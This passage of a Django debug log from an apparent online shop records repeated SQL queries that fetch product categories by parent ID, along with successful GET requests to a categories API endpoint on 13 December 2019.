"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:02:11,966 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:02:11,968 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:02:11,971 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:02:11,973 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:02:11,975 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:02:11,977 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:02:11,979 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:02:11] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:03:34,787 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:03:34,794 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:03:34,797 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:03:34,800 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:03:34,803 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:03:34,805 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:03:34,807 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:03:34,810 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:03:34,812 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:03:34,815 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:03:34,817 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:03:34] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:04:36,524 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:04:36,532 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:04:36,537 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:04:36,541 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:04:36,545 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:04:36,550 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:04:36,555 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:04:36,559 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:04:36,563 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:04:36,567 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:04:36,571 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:04:36] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:04:50,968 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:04:50,973 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:04:50,976 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:04:50,980 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:04:50,983 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:04:50,985 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:04:50,988 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:04:50,990 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:04:50,992 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:04:50,994 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:04:50,996 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:04:50] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:06:07,682 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:06:07,686 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:06:07,689 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:06:07,691 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:06:07,693 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:06:07,695 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:06:07,697 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:06:07,699 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:06:07,702 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:06:07,704 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:06:07,706 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:06:07] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:06:39,897 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:06:39,903 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:06:39,906 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:06:39,908 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:06:39,910 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:06:39,913 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:06:39,915 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:06:39,917 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:06:39,920 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:06:39,922 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:06:39,924 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:06:39] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:07:01,382 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:07:01,387 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:07:01,390 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:07:01,397 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:07:01,407 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 